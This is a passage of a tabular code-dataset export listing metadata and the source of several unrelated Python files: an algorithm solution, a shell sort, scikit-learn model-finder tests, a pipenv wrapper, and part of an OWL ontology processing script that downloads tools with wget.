hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a4d16b4c3d74ca8d527ddca0d0151b53656d5161 | 1,364 | py | Python | python/problems/degree_of_an_array.py | vivaxy/algorithms | b2e49476ed2ad1fd82a1183f656d1907a666c347 | [
"MIT"
] | 1 | 2019-05-04T13:21:41.000Z | 2019-05-04T13:21:41.000Z | python/problems/degree_of_an_array.py | vivaxy/algorithms | b2e49476ed2ad1fd82a1183f656d1907a666c347 | [
"MIT"
] | 1 | 2021-08-30T09:34:58.000Z | 2021-08-30T09:34:58.000Z | python/problems/degree_of_an_array.py | vivaxy/algorithms | b2e49476ed2ad1fd82a1183f656d1907a666c347 | [
"MIT"
] | null | null | null | """
https://leetcode.com/problems/degree-of-an-array/
https://leetcode.com/submissions/detail/130966108/
"""
class Solution:
def findShortestSubArray(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
d = dict()
for index, num in enumerate(nums):
if num in d:
d[num]['end'] = index
d[num]['count'] += 1
else:
d[num] = {
'count': 1,
'start': index,
'end': index,
}
maxCount = 0
minLenght = len(nums)
for value in d:
count = d[value]['count']
if count > maxCount:
maxCount = count
minLenght = d[value]['end'] - d[value]['start'] + 1
elif count == maxCount:
currentLength = d[value]['end'] - d[value]['start'] + 1
if minLenght > currentLength:
minLenght = currentLength
return minLenght
import unittest
class Test(unittest.TestCase):
def test(self):
solution = Solution()
self.assertEqual(solution.findShortestSubArray([1, 2, 2, 3, 1]), 2)
self.assertEqual(solution.findShortestSubArray(
[1, 2, 2, 3, 1, 4, 2]), 6)
if __name__ == '__main__':
unittest.main()
| 26.230769 | 75 | 0.483138 | 1,181 | 0.865836 | 0 | 0 | 0 | 0 | 0 | 0 | 246 | 0.180352 |
a4d22d1bd565732da4c1ec7b24284eccde734139 | 318 | py | Python | algorithms/shellSort.py | maxotar/algorithms | d8b112ffa0c6de78de0b84599d1de8aebf37dad4 | [
"MIT"
] | null | null | null | algorithms/shellSort.py | maxotar/algorithms | d8b112ffa0c6de78de0b84599d1de8aebf37dad4 | [
"MIT"
] | null | null | null | algorithms/shellSort.py | maxotar/algorithms | d8b112ffa0c6de78de0b84599d1de8aebf37dad4 | [
"MIT"
] | null | null | null | def shellSort(alist):
gap = len(alist) // 2
while gap > 0:
for i in range(gap, len(alist)):
val = alist[i]
j = i
while j >= gap and alist[j - gap] > val:
alist[j] = alist[j - gap]
j -= gap
alist[j] = val
gap //= 2
| 26.5 | 52 | 0.399371 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
a4d2bfb9bbe71f1897475772fae314ec357bb5a9 | 13,245 | py | Python | tests/test_model_finder_multiclass.py | maciek3000/data_dashboard | 1b573b674d37f57ae7e8bbfb1e83c801b488dfd6 | [
"MIT"
] | 8 | 2021-05-03T04:06:15.000Z | 2022-01-15T16:27:42.000Z | tests/test_model_finder_multiclass.py | maciek3000/data_dashboard | 1b573b674d37f57ae7e8bbfb1e83c801b488dfd6 | [
"MIT"
] | null | null | null | tests/test_model_finder_multiclass.py | maciek3000/data_dashboard | 1b573b674d37f57ae7e8bbfb1e83c801b488dfd6 | [
"MIT"
] | 3 | 2021-05-19T17:31:18.000Z | 2021-06-19T12:24:01.000Z | import pytest
import numpy as np
import pandas as pd
from sklearn.linear_model import LogisticRegression, RidgeClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
from sklearn.dummy import DummyClassifier
@pytest.mark.parametrize(
    ("test_input",),
    (
            ([0, 1, 2, 3, 4, 5],),
            ([6, 7, 8, 9, 10, 11],),
            ([12, 13, 14, 15, 16, 17],),
    )
)
def test_model_finder_dummy_multiclass(
        model_finder_multiclass, split_dataset_multiclass, seed, multiclass_scorings, test_input
):
    """_create_dummy_model() (multiclass) must build a 'stratified' DummyClassifier
    seeded with the shared test seed and return the expected baseline scores."""
    X_train = split_dataset_multiclass[0]
    y_train = split_dataset_multiclass[2]
    expected_model = DummyClassifier(strategy="stratified", random_state=seed)
    expected_model.fit(X_train, y_train)
    expected_model_scores = {"f1_score_weighted": 0.4772161172161172, "precision_score_weighted": 0.508}
    model_finder_multiclass.scoring_functions = multiclass_scorings
    model_finder_multiclass.default_scoring = multiclass_scorings[0]
    actual_model, actual_model_scores = model_finder_multiclass._create_dummy_model()
    # FIX: removed a leftover debug print of expected_model.predict(test_input);
    # it only added noise to the test output and affected no assertion.
    assert str(actual_model) == str(expected_model)
    assert np.array_equal(actual_model.predict(test_input), expected_model.predict(test_input))
    assert actual_model_scores == expected_model_scores
def test_model_finder_multiclass_dummy_model_results(model_finder_multiclass, seed):
    """_dummy_model_results() (multiclass) must return a one-row DataFrame (index 9999)
    describing the DummyClassifier baseline with the expected metric values."""
    expected_row = {
        "model": "DummyClassifier",
        "fit_time": np.nan,
        "params": "{{'constant': None, 'random_state': {seed}, 'strategy': 'stratified'}}".format(seed=seed),
        "f1_score_micro": 0.48,
        "f1_score_weighted": 0.4772161172161172,
        "precision_score_weighted": 0.508,
        "recall_score_weighted": 0.48,
        "accuracy_score": 0.48,
        "balanced_accuracy_score": 0.4987373737373737,
    }
    expected_df = pd.DataFrame(expected_row, index=[9999])
    actual_df = model_finder_multiclass._dummy_model_results()
    # Column order may differ; align the expectation to the actual columns.
    assert actual_df.equals(expected_df[actual_df.columns])
@pytest.mark.parametrize(
    ("mode", "expected_model"),
    [
        ("quick", DecisionTreeClassifier(max_depth=10)),
        ("detailed", LogisticRegression(tol=0.1)),
    ]
)
def test_model_finder_multiclass_search(model_finder_multiclass, multiclass_scorings, mode, expected_model, seed):
    """search() (multiclass) should pick the expected estimator for each search mode."""
    expected_model.random_state = seed
    model_finder_multiclass._quicksearch_limit = 1
    found_model = model_finder_multiclass.search(models=None, scoring=multiclass_scorings[0], mode=mode)
    # Estimators compare by repr: parameters (incl. random_state) must match.
    assert str(found_model) == str(expected_model)
@pytest.mark.parametrize(
    ("models", "expected_model"),
    [
        (
            [RidgeClassifier(alpha=1.0, random_state=1),
             RidgeClassifier(alpha=100.0, random_state=1)],
            RidgeClassifier(alpha=1.0, random_state=1),
        ),
        (
            [SVC(C=1.0, random_state=10),
             SVC(C=10.0, random_state=14),
             SVC(C=100.0, random_state=35)],
            SVC(C=10.0, random_state=14),
        ),
    ]
)
def test_model_finder_multiclass_search_defined_models(
        model_finder_multiclass, multiclass_scorings, models, expected_model
):
    """Explicitly provided estimators (multiclass) are scored and the best one
    returned - including estimators absent from the default model collection."""
    best_model = model_finder_multiclass.search(models=models, scoring=multiclass_scorings[0])
    assert str(best_model) == str(expected_model)
def test_model_finder_perform_gridsearch_multiclass(
        model_finder_multiclass, multiclass_scorings, chosen_classifiers_grid, seed
):
    """_perform_gridsearch (multiclass) returns the winning (class, params) pairs
    and a per-class CV-result dict containing the standard sklearn keys plus one
    'param_<name>' key per tuned hyperparameter."""
    expected_models = [
        (DecisionTreeClassifier, {"max_depth": 10, "criterion": "gini", "random_state": seed}),
        (LogisticRegression, {"C": 1.0, "tol": 0.1, "random_state": seed}),
        (SVC, {"C": 1.0, "tol": 0.1, "random_state": seed})
    ]
    standard_keys = [
        "iter", "n_resources", "mean_fit_time", "std_fit_time", "mean_score_time", "std_score_time", "params",
        "split0_train_score", "split1_train_score", "split2_train_score", "split3_train_score", "split4_train_score",
        "split0_test_score", "split1_test_score", "split2_test_score", "split3_test_score", "split4_test_score",
        "rank_test_score", "mean_test_score", "mean_train_score", "std_test_score", "std_train_score"
    ]
    actual_models, actual_results = model_finder_multiclass._perform_gridsearch(
        chosen_classifiers_grid, multiclass_scorings[0], cv=5
    )
    assert sorted(actual_models, key=lambda pair: pair[0].__name__) == expected_models
    # One result entry per winning model, each exposing exactly the expected keys.
    assert len(actual_results) == len(expected_models)
    for clf, params in expected_models:
        expected_keys = set(standard_keys) | {"param_" + name for name in params}
        assert set(actual_results[clf].keys()) == expected_keys
def test_model_finder_perform_quicksearch_multiclass(
        model_finder_multiclass, multiclass_scorings, chosen_classifiers_grid, seed
):
    """_perform_quicksearch (multiclass) returns (class, score) pairs and a
    per-class result dict with fit_time/score/params keys."""
    expected_models = [
        (DecisionTreeClassifier, 0.948507632718159),
        (LogisticRegression, 0.8982456140350877),
        (SVC, 0.6207827260458838),
    ]
    expected_keys = {"fit_time", "f1_score_weighted", "params"}
    actual_models, actual_results = model_finder_multiclass._perform_quicksearch(
        chosen_classifiers_grid, multiclass_scorings[0]
    )
    assert sorted(actual_models, key=lambda pair: pair[0].__name__) == expected_models
    # One result entry per scored model, each exposing exactly the expected keys.
    assert len(actual_results) == len(expected_models)
    for clf, _score in expected_models:
        assert set(actual_results[clf].keys()) == expected_keys
@pytest.mark.parametrize(
    ("limit", "expected_models"),
    [
        (1, [DecisionTreeClassifier]),
        (2, [DecisionTreeClassifier, LogisticRegression]),
    ]
)
def test_model_finder_quicksearch_multiclass(
        model_finder_multiclass, chosen_classifiers_grid, multiclass_scorings, limit, expected_models
):
    """_quicksearch (multiclass) must truncate the ranked model list to the
    configured _quicksearch_limit."""
    model_finder_multiclass._quicksearch_limit = limit
    chosen_models = model_finder_multiclass._quicksearch(chosen_classifiers_grid, multiclass_scorings[0])
    assert chosen_models == expected_models
def test_model_finder_assess_models_multiclass(model_finder_multiclass, multiclass_scorings, seed):
    """_assess_models_performance (multiclass) returns (model, score) pairs and a
    per-model result dict with the expected score/metadata keys."""
    candidates = [
        DecisionTreeClassifier(max_depth=10, criterion="entropy", random_state=seed),
        LogisticRegression(C=1.0, tol=0.1, random_state=seed),
        SVC(C=0.1, tol=0.1, random_state=seed),
    ]
    expected_pairs = list(zip(candidates, [1.0, 1.0, 0.26888888888888896]))
    expected_keys = {"fit_time", "f1_score_weighted", "params", "precision_score_weighted"}
    actual_pairs, actual_results = model_finder_multiclass._assess_models_performance(
        candidates, multiclass_scorings[0]
    )
    assert actual_pairs == expected_pairs
    assert len(actual_results) == len(expected_pairs)
    # Each model's result entry must expose exactly the expected keys.
    for result in actual_results.values():
        assert set(result.keys()) == expected_keys
@pytest.mark.parametrize(
    ("limit",),
    [(1,), (2,)]
)
def test_model_finder_multiclass_search_results_dataframe(model_finder_multiclass_fitted, limit, seed):
    """search_results() (multiclass) keeps only `limit` models plus the dummy
    baseline row, and exposes the expected metric columns."""
    ranked_models = ["DecisionTreeClassifier", "LogisticRegression", "SVC"]
    expected_index = ranked_models[:limit] + ["DummyClassifier"]
    expected_columns = {
        "fit_time", "params", "f1_score_weighted", "f1_score_micro", "precision_score_weighted",
        "accuracy_score", "recall_score_weighted", "balanced_accuracy_score",
    }
    results_df = model_finder_multiclass_fitted.search_results(limit)
    assert results_df.index.tolist() == expected_index
    assert set(results_df.columns) == expected_columns
@pytest.mark.parametrize(
    ("input_func", "expected_results"),
    [
        (
            (lambda y_true, y_score, param_one, param_two: y_true + y_score + param_one + param_two,
             {"param_one": 10, "param_two": 20}, "test_func1"),
            [33, 4, 5],
        ),
        (
            (lambda y_true, y_score, param_multiply: (y_true + y_score) * param_multiply,
             {"param_multiply": 100}, "test_func2"),
            [300, 4, 5],
        ),
    ]
)
def test_model_finder_multiclass_create_scoring_multiclass(
        model_finder_multiclass, input_func, expected_results
):
    """_create_scoring_multiclass() must wrap each parametrized scorer
    (func, kwargs, name) into a closure and prepend it to the plain
    two-argument multiclass scorers."""
    y_actual, y_predicted = 1, 2

    def plus_one(y_true, y_score):
        return y_true + y_score + 1

    def plus_two(y_true, y_score):
        return y_true + y_score + 2

    model_finder_multiclass._scoring_multiclass = [plus_one, plus_two]
    model_finder_multiclass._scoring_multiclass_parametrized = [input_func]
    scorings = model_finder_multiclass._create_scoring_multiclass()
    actual_results = [scorer(y_actual, y_predicted) for scorer in scorings]
    assert actual_results == expected_results
@pytest.mark.parametrize(
    ("limit",),
    [(1,), (2,), (3,)]
)
def test_model_finder_multiclass_confusion_matrices(model_finder_multiclass_fitted, limit):
    """confusion_matrices() (multiclass) returns one 3x3 matrix per model,
    best model first, truncated to `limit` entries."""
    all_expected = [
        ("DecisionTreeClassifier", [11, 0, 0, 0, 6, 0, 0, 0, 8]),
        ("LogisticRegression", [11, 0, 0, 0, 6, 0, 0, 0, 8]),
        ("SVC", [11, 0, 0, 0, 6, 0, 3, 0, 5]),
    ]
    actual = model_finder_multiclass_fitted.confusion_matrices(limit)
    for (model, matrix), (expected_name, expected_cells) in zip(actual, all_expected[:limit]):
        assert model.__class__.__name__ == expected_name
        assert matrix.shape == (3, 3)
        assert matrix.ravel().tolist() == expected_cells
@pytest.mark.parametrize(
    ("limit",),
    [(1,), (2,), (3,)]
)
def test_model_finder_predict_X_test_multiclass(model_finder_multiclass_fitted, split_dataset_multiclass, limit, seed):
    """predictions_X_test() (multiclass) returns (model, predictions) pairs that
    match re-fitting the same estimators on the train split and predicting on
    the test split, truncated to `limit` entries."""
    X_train, X_test, y_train, y_test = split_dataset_multiclass
    estimators = [
        DecisionTreeClassifier(max_depth=10, random_state=seed),
        LogisticRegression(C=1.0, tol=0.1, random_state=seed),
        SVC(tol=0.1, random_state=seed),
    ]
    # .fit() returns the estimator itself, so each pair keeps the fitted model.
    expected = [(est, est.fit(X_train, y_train).predict(X_test)) for est in estimators]
    actual = model_finder_multiclass_fitted.predictions_X_test(limit)
    for (actual_model, actual_pred), (expected_model, expected_pred) in zip(actual, expected[:limit]):
        assert str(actual_model) == str(expected_model)
        assert np.array_equal(actual_pred, expected_pred)
@pytest.mark.parametrize(
    ("model",),
    [
        (LogisticRegression(),),
        (SVC(C=1000.0),),
        (DecisionTreeClassifier(max_depth=10, criterion="entropy"),),
    ]
)
def test_model_finder_calculate_model_score_multiclass_regular_scoring(
        model_finder_multiclass, split_dataset_multiclass, model
):
    """_calculate_model_score (multiclass, scoring != roc_auc_score) must equal
    calling the scoring function directly on the model's test-set predictions."""
    scoring = accuracy_score
    X_train, X_test, y_train, y_test = split_dataset_multiclass
    model.fit(X_train, y_train)
    expected_score = scoring(y_test, model.predict(X_test))
    actual_score = model_finder_multiclass._calculate_model_score(model, X_test, y_test, scoring)
    assert actual_score == expected_score
| 39.655689 | 119 | 0.693016 | 0 | 0 | 0 | 0 | 8,438 | 0.637071 | 0 | 0 | 2,997 | 0.226274 |
a4d2c519e52801c5f72a8807dcf068695b6c4b84 | 2,249 | py | Python | possum/utils/pipenv_.py | brysontyrrell/Possum | 0ae7c90d7890f16d8405e346b0778bf878e29d5f | [
"MIT"
] | 24 | 2018-03-14T15:25:52.000Z | 2019-03-13T18:36:46.000Z | possum/utils/pipenv_.py | brysontyrrell/Possum | 0ae7c90d7890f16d8405e346b0778bf878e29d5f | [
"MIT"
] | 20 | 2018-04-11T04:36:40.000Z | 2019-01-17T11:44:30.000Z | possum/utils/pipenv_.py | brysontyrrell/Possum | 0ae7c90d7890f16d8405e346b0778bf878e29d5f | [
"MIT"
] | 5 | 2018-01-04T21:10:15.000Z | 2019-01-16T20:10:12.000Z | import os
import shutil
import subprocess
from possum.exc import PipenvPathNotFound
class PipenvWrapper:
    """Thin wrapper around the ``pipenv`` command line tool.

    Locates the ``pipenv`` executable on PATH at construction time and exposes
    helpers for creating, inspecting and removing the project's virtual
    environment.  Every operation shells out to ``pipenv``; nothing is done
    in-process.

    Raises:
        PipenvPathNotFound: if ``pipenv`` is not available on PATH.
    """

    def __init__(self):
        self.pipenv_path = shutil.which('pipenv')
        if not self.pipenv_path:
            raise PipenvPathNotFound
        # Force pipenv to ignore any currently active pipenv environment
        os.environ['PIPENV_IGNORE_VIRTUALENVS'] = '1'

    @property
    def venv_path(self):
        # Path of the virtualenv pipenv manages for the current directory.
        return self.get_virtual_environment_path()

    def create_virtual_environment(self):
        """Create a Python 3 virtual environment via ``pipenv --three``."""
        p = subprocess.Popen(
            [self.pipenv_path, '--three'],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE
        )
        p.communicate()

    def get_virtual_environment_path(self):
        """Return the virtualenv path reported by ``pipenv --venv``."""
        p = subprocess.Popen(
            [self.pipenv_path, '--venv'],
            stdout=subprocess.PIPE
        )
        result = p.communicate()
        return result[0].decode('ascii').strip('\n')

    def get_site_packages(self):
        """Return the site-packages directory of the pipenv environment.

        FIX: previously invoked the bare string 'pipenv' instead of the
        resolved ``self.pipenv_path`` used everywhere else in this class.
        """
        return subprocess.check_output(
            [
                self.pipenv_path, 'run', 'python', '-c',
                'from distutils.sysconfig import get_python_lib; '
                'print(get_python_lib())'
            ],
            universal_newlines=True
        ).strip()

    def install_packages(self):
        """Run ``pipenv install`` (output suppressed)."""
        p = subprocess.Popen(
            [self.pipenv_path, 'install'],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL
        )
        p.communicate()

    def remove_virtualenv(self):
        """Run ``pipenv --rm`` (output suppressed) to delete the virtualenv."""
        p = subprocess.Popen(
            [self.pipenv_path, '--rm'],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL
        )
        p.communicate()

    def check_package_title(self, package):
        """Return ``package.__title__`` as reported inside the pipenv
        environment, falling back to the package name on failure.

        NOTE(review): runs through the shell (shell=True) with the package
        name interpolated into the command string - only call with trusted
        input.
        """
        try:
            # Yes, this needs to be better, but performing this one-liner
            # though the Pipenv environment of the project only seems to work
            # when 'shell=True' is set.
            return subprocess.check_output(
                f'{self.pipenv_path} run python -c "import '
                f'{package}; print({package}.__title__)"',
                shell=True, universal_newlines=True
            ).strip()
        except subprocess.CalledProcessError:
            return package
| 29.592105 | 77 | 0.581147 | 2,161 | 0.960871 | 0 | 0 | 85 | 0.037795 | 0 | 0 | 483 | 0.214762 |
a4d3c18e507f51dc482e2dde54e9596a534b4b39 | 360 | py | Python | tests/test__init__.py | Combofoods/pyenv | 8b33173e593054b8d46a8c3be99c44f7294c7069 | [
"MIT"
] | 1 | 2020-07-22T12:19:26.000Z | 2020-07-22T12:19:26.000Z | tests/test__init__.py | Combofoods/pyenv | 8b33173e593054b8d46a8c3be99c44f7294c7069 | [
"MIT"
] | null | null | null | tests/test__init__.py | Combofoods/pyenv | 8b33173e593054b8d46a8c3be99c44f7294c7069 | [
"MIT"
] | null | null | null | import pytest
import envpy
import os
# Location of the test fixture: <this test dir>/resources/test.env
folder = os.path.dirname(__file__)
folder_env_file = f'{folder}/resources'
file_dot_env = 'test.env'
def test__init__():
    """Smoke-test envpy: load variables from the fixture .env file and print them."""
    options = {'filepath': folder_env_file, 'filename': file_dot_env}
    envpy.get_variables(**options)
    envpy.printenv(envpy.get_variables(**options))
if __name__ == "__main__":
test__init__() | 18 | 64 | 0.713889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 61 | 0.169444 |
a4d467254a4a29717b7a458692ff809fe8f6fa14 | 195 | py | Python | randomAgent.py | FavOla/SIAUROP | 9d3f4ade1ab00a16dbc8ae9c1bd8c1f960d11aff | [
"MIT"
] | null | null | null | randomAgent.py | FavOla/SIAUROP | 9d3f4ade1ab00a16dbc8ae9c1bd8c1f960d11aff | [
"MIT"
] | null | null | null | randomAgent.py | FavOla/SIAUROP | 9d3f4ade1ab00a16dbc8ae9c1bd8c1f960d11aff | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: fnels
"""
import random
def random_actions():
    """Return a single-element list holding one random action id in [0, 3]."""
    return [random.randint(0, 3)]
| 16.25 | 44 | 0.558974 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 68 | 0.348718 |
a4d50e8466b5656c97fd8b070e30b4fcbd98845c | 18,320 | py | Python | scripts/owlnets_script/__main__pre_20210905.py | hubmapconsortium/ontology-api | f7fadf31de028acdd9cabbb5e9d6e48b9863ffac | [
"MIT"
] | 2 | 2021-10-03T15:31:55.000Z | 2021-10-04T08:55:23.000Z | scripts/owlnets_script/__main__pre_20210905.py | hubmapconsortium/ontology-api | f7fadf31de028acdd9cabbb5e9d6e48b9863ffac | [
"MIT"
] | 105 | 2020-12-11T13:03:31.000Z | 2022-03-31T17:08:03.000Z | scripts/owlnets_script/__main__pre_20210905.py | hubmapconsortium/ontology-api | f7fadf31de028acdd9cabbb5e9d6e48b9863ffac | [
"MIT"
] | 2 | 2021-07-08T14:49:25.000Z | 2022-02-14T20:12:20.000Z | #!/usr/bin/env python
import argparse
import os
import pkt_kg as pkt
import psutil
import re
from rdflib import Graph
from rdflib.namespace import OWL, RDF, RDFS
from tqdm import tqdm
import glob
import logging.config
import time
from datetime import timedelta
from lxml import etree
from urllib.request import urlopen
import subprocess
import hashlib
from typing import Dict
# Setup and running the script...
#
# $ cd scripts
# $ python3 -m venv venv
# $ source venv/bin/activate
# $ python --version
# Python 3.9.5
# $ pip install -r requirements.txt
# $ brew install wget
# $ ./owlnets_script/__main__.py owl_url
class RawTextArgumentDefaultsHelpFormatter(
    argparse.ArgumentDefaultsHelpFormatter,
    argparse.RawTextHelpFormatter
):
    """argparse help formatter that shows argument defaults AND preserves the
    raw (newline-containing) layout of description/help strings."""
    pass
# https://docs.python.org/3/howto/argparse.html
# Command-line interface: one required OWL URL plus optional directory/behavior flags.
parser = argparse.ArgumentParser(
    description='Run PheKnowLator on OWL file (required parameter).\n'
                'Before running check to see if there are imports in the OWL file and exit if so'
                'unless the --with_imports switch is also given.\n'
                '\n'
                'In general you should not have the change any of the optional arguments',
    formatter_class=RawTextArgumentDefaultsHelpFormatter)
parser.add_argument('owl_url', type=str,
                    help='url for the OWL file to process.')
parser.add_argument("-l", "--owlnets_dir", type=str, default='./owlnets_output',
                    help='directory used for the owlnets output files')
parser.add_argument("-t", "--owltools_dir", type=str, default='./pkt_kg/libs',
                    help='directory where the owltools executable is downloaded to')
parser.add_argument("-o", "--owl_dir", type=str, default='./owl',
                    help='directory used for the owl input files')
parser.add_argument("-c", "--clean", action="store_true",
                    help='clean the owlnets_output directory of previous output files before run')
parser.add_argument("-d", "--force_owl_download", action="store_true",
                    help='force downloading of the .owl file before processing')
parser.add_argument("-w", "--with_imports", action="store_true",
                    help='process OWL file even if imports are found, otherwise give up with an error')
parser.add_argument("-r", "--robot", action="store_true",
                    help='apply robot to owl_url incorporating the includes and exit')
parser.add_argument("-v", "--verbose", action="store_true",
                    help='increase output verbosity')
args = parser.parse_args()
# Logging: find a logging.ini anywhere under the cwd; write the build log to builds/logs/.
log_dir, log, log_config = 'builds/logs', 'pkt_build_log.log', glob.glob('**/logging.ini', recursive=True)
logger = logging.getLogger(__name__)
# NOTE(review): log_config[0] raises IndexError when no logging.ini is found -
# presumably the script is always run from a checkout containing one; confirm.
logging.config.fileConfig(log_config[0], disable_existing_loggers=False, defaults={'log_file': log_dir + '/' + log})
# URL of the OWL file to process (required positional argument).
uri = args.owl_url
def file_from_uri(uri_str: str) -> str:
    """Return the final path segment of a URI (its file name).

    FIX: the original tested ``uri_str.find('/')`` for truthiness, so it
    returned None when the only '/' was at index 0 (find() == 0 is falsy) and
    raised IndexError when no '/' was present (find() == -1 is truthy but
    rsplit yields a single element).  rsplit(...)[-1] handles every case:
    with no separator the whole string is returned.
    """
    return uri_str.rsplit('/', 1)[-1]
def file_from_path(path_str: str) -> str:
    """Return the file-name component after the last os.sep, or None when the
    path has no separator, starts with its only separator, or ends with one.

    FIX: the original condition used bitwise '&', which binds tighter than
    the comparisons - 'i > 0 & i < len(path_str)-1' parses as the chained
    comparison 'i > (0 & i) < len(path_str)-1', so the intended upper-bound
    check was never applied as written.
    """
    i = path_str.rfind(os.sep)
    if 0 < i < len(path_str) - 1:
        return path_str[i + 1:]
    return None
def download_owltools(loc: str) -> None:
    """Download the 'owltools' executable into `loc` unless it is already there.

    Shells out to ls/mkdir/wget/chmod (POSIX only) and temporarily changes the
    process working directory while downloading.
    """
    owl_tools_url = 'https://github.com/callahantiff/PheKnowLator/raw/master/pkt_kg/libs/owltools'
    # Existence check via the exit status of 'ls'; non-zero means the file is missing.
    cmd = os.system(f"ls {loc}{os.sep}owltools")
    if os.WEXITSTATUS(cmd) != 0:
        logger.info('Download owltools and update permissions')
        # move into pkt_kg/libs/ directory
        cwd = os.getcwd()
        os.system(f"mkdir -p {loc}")
        os.chdir(loc)
        os.system(f'wget {owl_tools_url}')
        os.system('chmod +x owltools')
        # move back to the working directory
        os.chdir(cwd)
def download_owl(url: str, loc: str, force_empty=True) -> str:
    """Download `url` into directory `loc` with wget and write a sidecar
    '<file>.md5' checksum file next to it.

    Returns the hex MD5 digest of the downloaded file.

    Fixes in this revision:
    - derive the local file name from `url` instead of relying on the
      module-level global `working_file` (defined much later in this script,
      which made the function unusable on its own);
    - the "MD5 ... saved to ..." log call was missing its f-string prefix and
      logged the literal placeholder text;
    - failure messages now report `url` (the argument) rather than the global
      `uri`;
    - the downloaded file is read inside a context manager, and the original
      working directory is restored even on error.
    """
    logger.info(f'Downloading owl file from \'{url}\' to \'{loc}\'')
    owl_filename: str = file_from_uri(url)
    cwd: str = os.getcwd()
    os.system(f"mkdir -p {loc}")
    os.chdir(loc)
    try:
        if force_empty is True:
            os.system(f"rm -f *.owl *.md5")
        # TODO: This hangs sometimes, so there should be a timeout...
        wgetResults: bytes = subprocess.check_output([f'wget {url}'], shell=True, stderr=subprocess.STDOUT)
        wgetResults_str: str = wgetResults.decode('utf-8')
        # wget prints 'Length: unspecified' when the server did not serve a real file.
        for line in wgetResults_str.strip().split('\n'):
            if 'Length: unspecified' in line:
                logger.error(f'Failed to download {url}')
                print(f'Failed to download {url}')
                print(wgetResults_str)
                exit(1)
        if args.verbose:
            print(wgetResults_str)
        with open(owl_filename, 'rb') as fp:
            md5: str = hashlib.md5(fp.read()).hexdigest()
        md5_file: str = f'{owl_filename}.md5'
        logger.info(f'MD5 for owl file {md5} saved to {md5_file}')
        with open(md5_file, 'w', newline='') as fp:
            fp.write(md5)
    finally:
        os.chdir(cwd)
    return md5
def compare_file_md5(working_file: str) -> bool:
    """Return True when `working_file` exists and its MD5 digest matches the
    digest stored in the sidecar '<working_file>.md5' file; False otherwise."""
    checksum_path: str = f'{working_file}.md5'
    if not (os.path.isfile(working_file) and os.path.isfile(checksum_path)):
        return False
    with open(checksum_path, 'r', newline='') as fh:
        stored_digest = fh.read()
    with open(working_file, 'rb') as fh:
        current_digest = hashlib.md5(fh.read()).hexdigest()
    return current_digest == stored_digest
# https://docs.python.org/3/library/xml.etree.elementtree.html#parsing-xml-with-namespaces
def scan_xml_tree_for_imports(tree: etree.ElementTree) -> list:
    """Collect the rdf:resource URI of every owl:Ontology/owl:imports element in `tree`."""
    # These should be read from the source file via the 'xmlns' property....
    owl_ns: str = 'http://www.w3.org/2002/07/owl#'
    rdf_ns: str = 'http://www.w3.org/1999/02/22-rdf-syntax-ns#'
    import_nodes: list = tree.findall('owl:Ontology/owl:imports', namespaces={'owl': owl_ns})
    return [node.get(f"{{{rdf_ns}}}resource") for node in import_nodes]
def search_owl_file_for_imports(owl_filename: str) -> None:
    """Parse `owl_filename` and abort the run (exit 1) when it declares
    owl:imports, unless the --with_imports flag was given."""
    # Local parser renamed so it no longer shadows the module-level argparse `parser`.
    html_parser = etree.HTMLParser()
    parsed_tree: etree.ElementTree = etree.parse(owl_filename, html_parser)
    found_imports: list = scan_xml_tree_for_imports(parsed_tree)
    if not found_imports:
        msg = f"No imports were found in OWL file {uri}"
        logger.info(msg)
        if args.verbose:
            print(msg)
        return
    logger.info(f"Found the following imports were found in the OWL file {uri} : {', '.join(found_imports)}")
    if args.with_imports is not True:
        exit_msg = f"Imports found in OWL file {uri}. Exiting"
        logger.info(exit_msg)
        print(exit_msg)
        exit(1)
def log_files_and_sizes(dir: str) -> None:
    """Log the path and byte size of every entry in directory `dir`."""
    for entry in os.listdir(dir):
        generated_file: str = os.path.join(dir, entry)
        size: int = os.path.getsize(generated_file)
        logger.info(f"Generated file '{generated_file}' size {size:,}")
def robot_merge(owl_url: str) -> None:
    """Download the ROBOT tool (jar + launcher script) into ./robot if needed
    and run 'robot merge' on `owl_url`, producing '<owl_file>.merge' there.

    Requires JAVA_HOME to point at a JDK; shells out to wget/chmod/robot and
    temporarily changes the process working directory.
    """
    # NOTE(review): logs the module-level `uri`, not the `owl_url` argument -
    # identical when called from this script, but misleading otherwise.
